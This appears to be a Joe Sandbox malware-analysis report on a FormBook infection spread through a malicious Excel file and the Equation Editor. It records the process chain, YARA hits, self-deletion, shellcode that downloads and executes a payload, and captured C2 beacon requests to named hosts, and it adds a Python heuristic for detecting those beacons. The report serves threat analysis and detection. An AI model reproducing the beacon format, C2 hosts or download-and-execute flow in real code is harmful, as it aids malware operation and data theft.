                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 32 33 31 32 22 20 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 d2 b3 c3 e6 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 71 71 2e 63 6f 6d 2f 34 30 34 2f 73 65 61 72 63 68 5f 63 68 69 6c 64 72 65 6e 2e 6a 73 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a c4 e3 b7 c3 ce ca b5 c4 d2 b3 c3 e6 b2 bb b4 e6 d4 da a1 a3 a1 a3 a1 a3 a1 a3 20 20 3c 61 20 68 72 65 66 3d 22 2f 22 3e b7 b5 bb d8 d6 f7 d2 b3 3c 2f 61 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=gb2312" /><title>404</title></head><body><script type="text/javascript" src="http://www.qq.com/404/search_children.js" charset="utf-8"></script> <a href="/"></a></body></html>


Session ID: 4
Source IP: 192.168.2.22
Source Port: 49177
Destination IP: 23.81.214.26
Destination Port: 80
Process: C:\Windows\explorer.exe
Timestamp: May 14, 2022 15:21:06.148781061 CEST
kBytes transferred: 286
Direction: OUT
Data: GET /nc39/?dZzp=SW2DOu4AoD1tt2PaEEhiNvSk2qD2OpQeAcSR0NEUE8SsNGniN/+F24NqGXKX7Cj1ljS/6Q==&3f=j6AdrVwh HTTP/1.1
                                                      Host: www.yiwanggkm.com
                                                      Connection: close
                                                      Data Raw: 00 00 00 00 00 00 00
                                                      Data Ascii:
Timestamp: May 14, 2022 15:21:06.311940908 CEST
kBytes transferred: 287
Direction: IN
Data: HTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Sat, 14 May 2022 13:20:51 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 1782
                                                      Connection: close
                                                      Vary: Accept-Encoding
                                                      Data Raw: 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 74 69 74 6c 65 3d 27 c1 b9 c9 bd c7 c8 d3 d4 bd cc d3 fd d7 c9 d1 af d3 d0 cf de b9 ab cb be 27 3b 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 74 69 74 6c 65 3e 26 23 32 37 38 32 37 3b 26 23 32 31 33 33 35 3b 26 23 32 32 39 31 39 3b 26 23 32 32 38 39 39 3b 26 23 32 37 36 31 31 3b 26 23 33 33 35 39 32 3b 26 23 33 33 35 39 32 3b 26 23 39 38 3b 26 23 39 38 3b 26 23 31 31 39 3b 2c 26 23 32 30 31 32 32 3b 26 23 32 37 39 35 34 3b 26 23 32 36 30 38 35 3b 26 23 32 36 34 31 32 3b 26 23 33 39 36 34 30 3b 26 23 32 38 31 36 35 3b 26 23 31 39 39 36 38 3b 26 23 32 31 33 30 36 3b 26 23 32 30 31 30 38 3b 26 23 32 31 33 30 36 3b 26 23 31 39 39 37 37 3b 26 23 32 31 33 30 36 3b 2c 26 23 33 31 39 33 34 3b 26 23 32 31 36 39 37 3b 26 23 32 33 35 36 39 3b 26 23 32 32 39 31 39 3b 26 23 32 30 31 35 34 3b 26 23 32 32 39 37 31 3b 26 23 39 37 3b 26 23 31 31 38 3b 26 23 32 30 38 31 33 3b 26 23 33 36 31 35 33 3b 26 23 32 30 30 33 37 3b 26 23 32 30 30 33 37 3b 2c 26 23 33 34 35 38 38 3b 26 23 33 33 34 36 39 3b 26 23 34 30 36 33 35 3b 26 23 33 35 39 31 30 3b 26 23 32 33 35 38 38 3b 26 23 32 39 32 38 39 3b 26 23 32 32 32 36 39 3b 26 23 32 30 31 33 35 3b 26 23 33 31 39 33 34 3b 26 23 32 31 36 39 37 3b 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 26 23 32 37 38 32 37 3b 26 23 32 31 33 33 35 3b 26 23 32 32 39 31 39 3b 26 23 32 32 38 39 39 3b 26 23 32 37 36 31 31 3b 26 23 33 33 35 39 32 3b 26 23 33 33 35 39 32 3b 26 23 39 38 3b 26 23 39 38 3b 26 23 31 31 39 3b 2c 26 23 32 30 31 32 32 3b 26 23 32 37 39 35 34 3b 26 23 32 36 30 38 35 3b 26 23 32 36 34 31 32 3b 26 23 33 39 36 34 30 3b 26 23 32 38 31 36 35 3b 26 23 31 39 39 36 38 3b 26 23 32 31 33 30 36 3b 26 23 32 30 
31 30 38 3b 26 23 32 31 33 30 36 3b 26 23 31 39 39 37 37 3b 26 23 32 31 33 30 36 3b 2c 26 23 33 31 39 33 34 3b 26 23 32 31 36 39 37 3b 26 23 32 33 35 36 39 3b 26 23 32 32 39 31 39 3b 26 23 32 30 31 35 34 3b 26 23 32 32 39 37 31 3b 26 23 39 37 3b 26 23 31 31 38 3b 26 23 32 30 38 31 33 3b 26 23 33 36 31 35 33 3b 26 23 32 30 30 33 37 3b 26 23 32 30 30 33 37 3b 2c 26 23 33 34 35 38 38 3b 26 23 33 33 34 36 39 3b 26 23 34 30 36 33 35 3b 26 23 33 35 39 31 30 3b 26 23 32 33 35 38 38 3b 26 23 32 39 32 38 39 3b 26 23 32 32 32 36 39 3b 26 23 32 30 31 33 35 3b 26 23 33 31 39 33 34 3b 26 23 32 31 36 39 37 3b 22 20 2f 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 26 23 32 37 38 32 37 3b 26 23 32 31 33 33 35 3b 26 23 32 32 39 31 39 3b 26 23 32 32 38 39 39 3b 26 23 32 37 36 31 31 3b 26 23 33 33 35 39 32 3b 26 23 33 33 35 39 32 3b 26 23 39 38 3b 26 23 39 38 3b 26 23 31 31 39 3b 2c 26 23 32 30 31 32 32 3b 26 23 32 37 39 35 34 3b 26 23 32 36 30 38 35 3b 26 23 32 36 34 31 32 3b 26 23 33 39 36 34 30 3b 26 23 32 38 31 36 35 3b 26 23 31 39 39 36 38 3b 26 23 32 31 33 30 36 3b 26 23 32 30 31 30 38 3b 26 23 32 31 33 30 36 3b 26 23 31 39 39 37 37 3b 26 23 32 31 33 30 36 3b 2c 26 23 33 31 39 33 34 3b 26 23 32 31 36 39 37 3b 26 23 32 33 35 36 39 3b 26 23 32 32 39 31 39 3b 26 23 32 30 31 35 34 3b 26 23 32 32 39 37 31 3b 26 23 39 37 3b 26 23 31 31 38 3b 26 23 32 30 38 31 33 3b 26 23 33 36 31 35 33 3b 26 23 32 30 30 33 37 3b 26 23 32 30 30 33 37 3b 2c 26 23 33 34 35 38 38 3b 26 23 33 33 34 36 39 3b 26 23 34 30 36 33 35 3b 26 23 33 35 39 31
                                                      Data Ascii: <html xmlns="http://www.w3.org/1999/xhtml"><head><script>document.title='';</script><title>&#27827;&#21335;&#22919;&#22899;&#27611;&#33592;&#33592;&#98;&#98;&#119;,&#20122;&#27954;&#26085;&#26412;&#39640;&#28165;&#19968;&#21306;&#20108;&#21306;&#19977;&#21306;,&#31934;&#21697;&#23569;&#22919;&#20154;&#22971;&#97;&#118;&#20813;&#36153;&#20037;&#20037;,&#34588;&#33469;&#40635;&#35910;&#23588;&#29289;&#22269;&#20135;&#31934;&#21697;</title><meta name="keywords" content="&#27827;&#21335;&#22919;&#22899;&#27611;&#33592;&#33592;&#98;&#98;&#119;,&#20122;&#27954;&#26085;&#26412;&#39640;&#28165;&#19968;&#21306;&#20108;&#21306;&#19977;&#21306;,&#31934;&#21697;&#23569;&#22919;&#20154;&#22971;&#97;&#118;&#20813;&#36153;&#20037;&#20037;,&#34588;&#33469;&#40635;&#35910;&#23588;&#29289;&#22269;&#20135;&#31934;&#21697;" /><meta name="description" content="&#27827;&#21335;&#22919;&#22899;&#27611;&#33592;&#33592;&#98;&#98;&#119;,&#20122;&#27954;&#26085;&#26412;&#39640;&#28165;&#19968;&#21306;&#20108;&#21306;&#19977;&#21306;,&#31934;&#21697;&#23569;&#22919;&#20154;&#22971;&#97;&#118;&#20813;&#36153;&#20037;&#20037;,&#34588;&#33469;&#40635;&#3591
Timestamp: May 14, 2022 15:21:06.311974049 CEST
kBytes transferred: 288
Direction: IN
Data Raw: 30 3b 26 23 32 33 35 38 38 3b 26 23 32 39 32 38 39 3b 26 23 32 32 32 36 39 3b 26 23 32 30 31 33 35 3b 26 23 33 31 39 33 34 3b 26 23 32 31 36 39 37 3b 2c 26 23 32 30 31 32 32 3b 26 23 32 37 39 35 34 3b 26 23 32 36 30 38 35 3b 26 23 32 36 34 31 32
                                                      Data Ascii: 0;&#23588;&#29289;&#22269;&#20135;&#31934;&#21697;,&#20122;&#27954;&#26085;&#26412;&#39640;&#28165;&#19968;&#21306;&#20108;&#21306;&#19977;&#21306;,&#21999;&#21834;&#21416;&#25151;&#37324;&#38394;&#34588;&#30340;&#21627;&#21535;&#22768;,&#2743
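The three explorer.exe sessions above share one request shape across three unrelated hosts: a single short directory (/nc39/), one long base64-like query value that changes per request, one short value (3f=j6AdrVwh) that does not, a 7-byte all-null body on a GET, and Connection: close. The Python below is an added example, not part of the Joe Sandbox report, that encodes that shape as a heuristic and runs it over session records constructed from the three requests above plus two constructed benign requests. The set of "system processes that should not originate plain-HTTP beacons" is an assumption of the example, as is the minimum length used to call a value base64-like.

```python
"""Added example (not part of the Joe Sandbox report): a heuristic for the
FormBook-style HTTP beacons seen in the explorer.exe sessions above, run over
constructed session records."""
import re
from collections import defaultdict
from dataclasses import dataclass, field


@dataclass
class HttpSession:
    session_id: int
    process: str          # image path of the sending process
    host: str
    dst_ip: str
    request_line: str
    headers: dict
    body: bytes


@dataclass
class Beacon:
    session_id: int
    host: str
    dst_ip: str
    campaign_key: tuple   # (URI directory, fixed short parameter value) shared by one bot's domain list
    reasons: list = field(default_factory=list)


# Assumption of this example: system processes that should never originate plain-HTTP beacons.
SYSTEM_PROCESSES = {"explorer.exe"}

# One short directory, one long opaque value, one short fixed value: the shape of all three requests above.
REQUEST_RE = re.compile(
    r"^GET /(?P<dir>[A-Za-z0-9]{2,8})/\?(?P<k1>[A-Za-z0-9]{1,8})=(?P<v1>[^&\s]+)"
    r"&(?P<k2>[A-Za-z0-9]{1,8})=(?P<v2>[A-Za-z0-9]{4,16}) HTTP/1\.[01]$"
)
B64_RE = re.compile(r"[A-Za-z0-9+/]+={0,2}")

# Constructed records mirroring sessions 2-4 above, plus two constructed benign requests (sessions 90, 91).
SESSIONS = [
    HttpSession(2, r"C:\Windows\explorer.exe", "www.contractornurd.com", "198.54.117.212",
                "GET /nc39/?dZzp=CWrF3poHj2MNQw4FqfZfOWFDC9Dy9qwGAafxJUMNhkwMJpF8RUBmV1WHKbaf9sKHKobluA==&3f=j6AdrVwh HTTP/1.1",
                {"Connection": "close"}, b"\x00" * 7),
    HttpSession(3, r"C:\Windows\explorer.exe", "www.tw-life.net", "164.155.217.57",
                "GET /nc39/?dZzp=Td3Z6WACWlvn2oxJ5kz3cAAvTYM+vx9a0mv4ko18Io/mhbtUurGZKYFJi0A4+N8FDsGh8g==&3f=j6AdrVwh HTTP/1.1",
                {"Connection": "close"}, b"\x00" * 7),
    HttpSession(4, r"C:\Windows\explorer.exe", "www.yiwanggkm.com", "23.81.214.26",
                "GET /nc39/?dZzp=SW2DOu4AoD1tt2PaEEhiNvSk2qD2OpQeAcSR0NEUE8SsNGniN/+F24NqGXKX7Cj1ljS/6Q==&3f=j6AdrVwh HTTP/1.1",
                {"Connection": "close"}, b"\x00" * 7),
    HttpSession(90, r"C:\Program Files\Mozilla Firefox\firefox.exe", "example.org", "203.0.113.10",
                "GET /index.html HTTP/1.1", {"Connection": "keep-alive"}, b""),
    HttpSession(91, r"C:\Program Files\Mozilla Firefox\firefox.exe", "example.org", "203.0.113.10",
                "GET /api/?id=42&v=abcd HTTP/1.1", {"Connection": "keep-alive"}, b""),
]


def is_base64ish(value, min_len=40):
    """Long run of base64 alphabet with at most two '=' pads; min_len is an assumed threshold."""
    return len(value) >= min_len and B64_RE.fullmatch(value) is not None


def score_session(s):
    """Return a Beacon if the session matches the URI shape, with corroborating reasons; else None."""
    m = REQUEST_RE.match(s.request_line)
    if m is None or not is_base64ish(m["v1"]):
        return None
    b = Beacon(s.session_id, s.host, s.dst_ip, (m["dir"], m["v2"]))
    b.reasons.append(f"URI /{m['dir']}/?{m['k1']}=<{len(m['v1'])}-char base64-like>&{m['k2']}={m['v2']}")
    proc = s.process.lower().rsplit("\\", 1)[-1]
    if proc in SYSTEM_PROCESSES:
        b.reasons.append(f"sent by system process {proc}")
    if s.body and set(s.body) == {0}:
        b.reasons.append(f"GET carries {len(s.body)} null bytes of body")
    if s.headers.get("Connection", "").lower() == "close":
        b.reasons.append("Connection: close (one request per connection)")
    return b


def find_beacons(sessions, min_reasons=2):
    """URI-shape match is mandatory; require at least one corroborating reason on top of it."""
    return [b for b in map(score_session, sessions) if b is not None and len(b.reasons) >= min_reasons]


def group_by_campaign(beacons):
    """Hosts grouped by the (directory, fixed parameter) pair; one group = one bot's domain list."""
    groups = defaultdict(list)
    for b in beacons:
        groups[b.campaign_key].append(b.host)
    return dict(groups)
```

Grouping on the pair that stays constant (directory plus the short fixed parameter) is the useful output: the three hosts are one bot walking its configured domain list, not three incidents, and the 403, 404 and parked-page 200 they returned show that a response code alone says nothing about which of those hosts is live. Block on the shape from the process, not on the hosts.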



                                                      Target ID:0
                                                      Start time:15:18:17
                                                      Start date:14/05/2022
                                                      Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                                      Imagebase:0x13fe10000
                                                      File size:28253536 bytes
                                                      MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      Target ID:2
                                                      Start time:15:18:42
                                                      Start date:14/05/2022
                                                      Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                                      Imagebase:0x400000
                                                      File size:543304 bytes
                                                      MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      Target ID:4
                                                      Start time:15:18:48
                                                      Start date:14/05/2022
                                                      Path:C:\Users\Public\vbc.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\Public\vbc.exe"
                                                      Imagebase:0x400000
                                                      File size:263772 bytes
                                                      MD5 hash:DE76EF6A11A63EFC00B0303888BC0B7F
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Antivirus matches:
                                                      • Detection: 100%, Joe Sandbox ML
                                                      • Detection: 51%, ReversingLabs
                                                      Reputation:low

                                                      Target ID:5
                                                      Start time:15:18:51
                                                      Start date:14/05/2022
                                                      Path:C:\Users\user\AppData\Local\Temp\yldnat.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Users\user\AppData\Local\Temp\yldnat.exe C:\Users\user\AppData\Local\Temp\boswagvgna
                                                      Imagebase:0x13b0000
                                                      File size:80384 bytes
                                                      MD5 hash:BC3C746DB1D3F8A821BBDF17CA023450
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.983399787.0000000000120000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.983399787.0000000000120000.00000004.00001000.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.983399787.0000000000120000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                      Reputation:low

                                                      Target ID:6
                                                      Start time:15:18:53
                                                      Start date:14/05/2022
                                                      Path:C:\Users\user\AppData\Local\Temp\yldnat.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Users\user\AppData\Local\Temp\yldnat.exe C:\Users\user\AppData\Local\Temp\boswagvgna
                                                      Imagebase:0x13b0000
                                                      File size:80384 bytes
                                                      MD5 hash:BC3C746DB1D3F8A821BBDF17CA023450
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.982109510.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.982109510.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.982109510.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.1032166526.0000000000240000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.1032166526.0000000000240000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.1032166526.0000000000240000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.1032215807.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.1032215807.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.1032215807.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.1032081329.00000000000C0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.1032081329.00000000000C0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.1032081329.00000000000C0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.981158681.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.981158681.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.981158681.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                      Reputation:low

                                                      Target ID:7
                                                      Start time:15:18:57
                                                      Start date:14/05/2022
                                                      Path:C:\Windows\explorer.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\Explorer.EXE
                                                      Imagebase:0xff040000
                                                      File size:3229696 bytes
                                                      MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000000.1012975505.000000000B8A4000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000000.1012975505.000000000B8A4000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000000.1012975505.000000000B8A4000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000000.1024425011.000000000B8A4000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000000.1024425011.000000000B8A4000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000000.1024425011.000000000B8A4000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                      Reputation:high

                                                      Target ID:8
                                                      Start time:15:19:15
                                                      Start date:14/05/2022
                                                      Path:C:\Windows\SysWOW64\wuapp.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Windows\SysWOW64\wuapp.exe
                                                      Imagebase:0x8e0000
                                                      File size:35328 bytes
                                                      MD5 hash:C8EBA45CEF271BED6C2F0E1965D229EA
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.1175423013.00000000001C0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.1175423013.00000000001C0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.1175423013.00000000001C0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.1175517654.0000000000270000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.1175517654.0000000000270000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.1175517654.0000000000270000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.1175360038.0000000000110000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.1175360038.0000000000110000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.1175360038.0000000000110000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                      Reputation:moderate

                                                      Target ID:9
                                                      Start time:15:19:20
                                                      Start date:14/05/2022
                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:/c del "C:\Users\user\AppData\Local\Temp\yldnat.exe"
                                                      Imagebase:0x4a3d0000
                                                      File size:302592 bytes
                                                      MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high


                                                        Execution Graph

                                                        Execution Coverage:4.5%
                                                        Dynamic/Decrypted Code Coverage:0%
                                                        Signature Coverage:52.7%
                                                        Total number of Nodes:224
                                                        Total number of Limit Nodes:3
execution_graph: [graph rendering omitted; the node/edge dump is not readable as text. Recoverable content: the graph covers code between 0x036d0000 and 0x036d058c, with an entry node at 0x036d0000 and a PEB read (GetPEB) at 0x036d0559. Its API nodes, in edge order, are LoadLibraryW (0x036d0494), URLDownloadToFileW (0x036d04bf), ShellExecuteW (0x036d0527, 0x036d0530) and ExitProcess (0x036d03ef, 0x036d0552, 0x036d0555): a download-and-execute sequence that terminates its own process on every path.]

                                                        Callgraph

                                                        Callgraph (rendered graph not preserved). Function_036D0000 -> Function_036D025C. Function_036D025C and the other entry variants (036D025F, 036D0264, 036D0269, 036D029D, 036D02A0, 036D02B8, 036D02BE, 036D02C1, 036D02FF, 036D030E, 036D031F, 036D0321, 036D0325, 036D032A, 036D0334, 036D033F, 036D0349, 036D034E, 036D0355, 036D0357, 036D0367, 036D038D, 036D039B) all call the same set: Function_036D03EF, 036D0424, 036D044B, 036D047F, 036D04AE, 036D04FF, 036D0518, 036D052D, 036D0552. Function_036D0359 calls the same set except 036D03EF. Function_036D03EF additionally calls Function_036D0408; Function_036D0408 calls Function_036D0424 plus the same helper set and Function_036D05D2; Function_036D0424 likewise calls Function_036D05D2. Helper chain: 036D044B -> 036D047F -> 036D0494 -> 036D04AE / 036D04FF / 036D0518 / 036D052D / 036D0552; 036D04AE -> 036D04FF / 036D0518 / 036D052D / 036D0552; 036D04FF -> 036D0518 / 036D052D / 036D0552; 036D0518 -> 036D052D / 036D0552; 036D052D -> 036D0552. Function_036D0559 -> Function_036D0581. Functions 036D0025, 036D00B0, 036D00C1, 036D00E3, 036D00F4, 036D0118, 036D012A, 036D0148 and 036D01A1 have no outgoing calls.

                                                        Control-flow Graph

                                                        Control-flow graph for 36d0494 (rendered graph not preserved): 36d0494-36d04b9 LoadLibraryW, call 36d04ae; 36d04ba call 36d04ff; 36d04bf-36d0501 URLDownloadToFileW; 36d0503 call 36d0518; 36d0508-36d0525 call 36d052d; 36d0527-36d0547 ShellExecuteW, call 36d0552; 36d054d-36d0557 ExitProcess; 36d058c-36d05cf are exit blocks without API calls.
                                                        APIs
                                                        • LoadLibraryW.KERNEL32(036D0486), ref: 036D0494
                                                          • Part of subcall function 036D04AE: URLDownloadToFileW.URLMON(00000000,036D04BF,?,00000000,00000000), ref: 036D0501
                                                          • Part of subcall function 036D04AE: ShellExecuteW.SHELL32(00000000,00000000,?,00000000,00000000,00000001), ref: 036D053F
                                                          • Part of subcall function 036D04AE: ExitProcess.KERNEL32(00000000), ref: 036D0557
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.972741377.00000000036D0000.00000004.00000800.00020000.00000000.sdmp, Offset: 036D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36d0000_EQNEDT32.jbxd
                                                        Similarity
                                                        • API ID: DownloadExecuteExitFileLibraryLoadProcessShell
                                                        • String ID:
                                                        • API String ID: 2508257586-0
                                                        • Opcode ID: ef98c3cab19a42d9f08d229c2ac280a93c12a853240ff167e2abdce7bd08b043
                                                        • Instruction ID: e86ec0dfd4b0952ee1775bba7ad3ca0f47a455e861f7bf5301ee6cdd7e37ddb5
                                                        • Opcode Fuzzy Hash: ef98c3cab19a42d9f08d229c2ac280a93c12a853240ff167e2abdce7bd08b043
                                                        • Instruction Fuzzy Hash: 722169E6C4C3C12EDB2397300E6EB69BF646F63204F9985CEE5C2094E3E6985500C767
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%
